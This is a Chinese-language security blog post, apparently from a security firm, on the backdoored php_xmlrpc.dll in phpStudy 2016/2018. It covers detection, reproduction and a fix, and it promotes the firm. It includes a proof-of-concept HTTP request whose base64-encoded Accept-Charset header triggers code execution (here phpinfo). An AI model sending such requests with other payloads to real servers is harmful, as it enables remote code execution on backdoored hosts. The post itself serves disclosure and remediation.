phpStudy poc漏洞復現以及漏洞修復辦法
phpStudy於近日被暴露出有後門漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程式包疑似被入侵者植入木馬後門,導致許多網站及伺服器被攻擊,被篡改,目前我們SINE安全公司立即成立phpStudy安全應急響應小組,針對部分客戶伺服器上安裝該PHP一鍵環境搭建的情況,進行了全面的漏洞修復與安全防護。第一時間保障客戶的網站安全,以及伺服器的安全穩定執行。關於該漏洞的詳情,我們來安全分析一下,以及復現,漏洞修復,三個方面來入手。
國內大部分的伺服器尤其windows系統,都有安裝phpstudy一鍵環境搭建軟體,該軟體可以自動設定安裝apache,php,mysql資料庫,以及zend安裝,並自動設定root賬號密碼,一鍵化操作,深受廣大網站運營以及伺服器維護者的喜歡,正因為使用的人較多,導致被攻擊者盯上並植入木馬後門到exe程式包中。
該後門檔案是PHP環境當中的php_xmlrpc.dll模組被植入木馬後門,具體的名稱,經過我們SINE安全技術的安全檢測,可以確定是phpstudy2016.11.03版本,以及phpstudy2018.02.11版本,後門檔案如下:
phpphp-5.2.17extphp_xmlrpc.dll
phpphp-5.4.45extphp_xmlrpc.dll
PHPTutorialphpphp-5.2.17extphp_xmlrpc.dll
PHPTutorialphpphp-5.4.45extphp_xmlrpc.dll
在phpstudy資料夾下面搜尋php_xmlrpc.dll檔案,看下這個dll檔案裡是否包含@eval(%s('%s'))內容的字元,如果有的話,基本上就是有木馬後門了。截圖如下:
我們來分析復現漏洞看下,是否可以成功的利用,首先本地安裝phpstudy2016.11.03版本的安裝壓縮包,解壓到當前目錄直接點選EXE執行即可,預設安裝的PHP版本就是php5.4.45版本,然後本地開啟看下,用抓包工具檢測當前的資料包。
GET /safe.php HTTP/1.1
Host:
Cache-Control: max-age=1
Upgrade-Insecure-Requests: 2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept:
Accept-Language: zh-CN,zh;q=0.6
Accept-Encoding:gzip
Accept-Charset:=cGhwaW5mbyUyOCUyOSUzQg==(這個是POC程式碼加密的)
Cookie: Hm_lpvt_49143271fe785debb3b77f77f7c71752=1569485559;
Connection: close
漏洞的執行位置是在資料包的Accept-Charset裡,這裡寫入惡意程式碼加密的phpinfo,然後提交過去,就會執行phpinfo語句。
關於phpstudy漏洞的修復辦法,從phpstudy官方網站下載最新的版本,將php_xmlrpc.dll進行替換到舊版本里即可,對PHP的Accept-Charset的引數傳輸做安全過濾與效驗防止提交惡意引數,禁止程式碼的傳輸,即可修復此漏洞, (經證實對此phpstudy官方公告此後門是駭客之前入侵了官網篡改了程式包導致的安全問題,強烈鄙視駭客的行為!)如果您對程式碼不是太瞭解的話,也可以找專業的網站安全公司來處理解決,國內SINESAFE,啟明星辰,綠盟都是比較不錯的,目前該漏洞影響範圍較廣,請各位網站運營者儘快修復漏洞,打好補丁,防止網站被攻擊,被篡改。
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/31542418/viewspace-2658500/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- apache網站漏洞修復解決辦法Apache網站
- 【漏洞修復通知】修復Apache Shiro認證繞過漏洞Apache
- PrestaShop網站漏洞修復如何修復REST網站
- metinfo sql注入漏洞修復建議與防範辦法SQL
- linux sudo漏洞修復辦法 可防禦黑客的攻擊Linux黑客
- 對泛微OA系統的網站安全檢測以及漏洞修復辦法網站
- 怎麼修復網站漏洞騎士cms的漏洞修復方案網站
- 網站漏洞修復SQL隱碼攻擊防護辦法網站SQL
- CVE-2020-0796永恆之黑復現POC EXP以及修復方案
- 網站漏洞修復 上傳webshell漏洞修補網站Webshell
- 如何對網站登入進行漏洞測試以及漏洞修復網站
- ecshop漏洞修復以及如何加固ecshop網站安全網站
- Apache漏洞復現Apache
- weblogic 漏洞復現Web
- struts2架構網站漏洞修復詳情與利用漏洞修復方案架構網站
- Linux常見漏洞修復教程!Linux
- weblogic T3 漏洞修復Web
- TomcatAJP檔案包含漏洞及線上修復漏洞Tomcat
- weblogic ssrf漏洞復現Web
- 笑臉漏洞復現
- Vulhub WebLogic漏洞復現Web
- Tomcat系列漏洞復現Tomcat
- 【阿菜漏洞復現】DeFi 平臺 MonoX Finance 漏洞分析及復現MonoNaN
- 網站漏洞修復對phpmyadmin防止被入侵提權的解決辦法網站PHP
- 修復網站漏洞對phpmyadmin防止被入侵提權的解決辦法網站PHP
- WordPress網站漏洞利用及漏洞修復解決方案網站
- 網站漏洞檢測對漏洞檢測修復方案網站
- 網站漏洞修復之Metinfo 檔案上傳漏洞網站
- WordPress 5.1.1 釋出 修復 CSRF 漏洞
- 任意檔案上傳漏洞修復
- thinkcmf 網站最新漏洞修復方法網站
- 雲伺服器修復apache漏洞伺服器Apache
- Weblogic-SSRF漏洞復現Web
- 護網漏洞復現(三)
- 網站漏洞處理修復服務之lankecms篡改漏洞網站
- Linux 髒管道kernel提權漏洞復現及修復(CVE-2022-0847)Linux
- 【漏洞復現】Shiro<=1.2.4反序列化漏洞
- Win10安全中心怎麼更新漏洞修復_win10使用安全中心更新漏洞修復教程Win10